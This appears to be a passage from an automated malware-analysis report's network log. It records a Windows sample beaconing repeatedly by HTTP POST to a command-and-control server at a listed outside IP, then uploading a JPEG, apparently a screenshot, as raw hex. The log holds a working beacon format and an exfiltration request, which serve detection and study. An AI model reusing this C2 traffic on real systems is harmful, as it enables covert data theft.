                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          313176.111.174.11480192.168.2.449937C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:00.589323997 CEST10432INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:00 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          314192.168.2.449938176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:00.808923960 CEST10433OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          315176.111.174.11480192.168.2.449938C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:00.916827917 CEST10433INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:00 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          316192.168.2.449939176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:01.133167028 CEST10434OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          317176.111.174.11480192.168.2.449939C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:01.238193989 CEST10434INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:01 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          318192.168.2.449940176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:01.443860054 CEST10435OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          319176.111.174.11480192.168.2.449940C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:01.547127962 CEST10435INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:01 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          32192.168.2.449764176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:14.955260038 CEST4537OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          320192.168.2.449942176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:01.755472898 CEST10436OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          321176.111.174.11480192.168.2.449942C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:01.861757994 CEST10436INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:01 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          322192.168.2.449943176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:02.078834057 CEST10437OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          323176.111.174.11480192.168.2.449943C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:02.191318989 CEST10437INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:02 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          324192.168.2.449944176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:02.406013966 CEST10438OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          325176.111.174.11480192.168.2.449944C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:02.512393951 CEST10438INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:02 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          326192.168.2.449945176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:02.760524035 CEST10439OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          327176.111.174.11480192.168.2.449945C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:02.862746000 CEST10439INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:02 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          328192.168.2.449946176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:02.968656063 CEST10453OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u 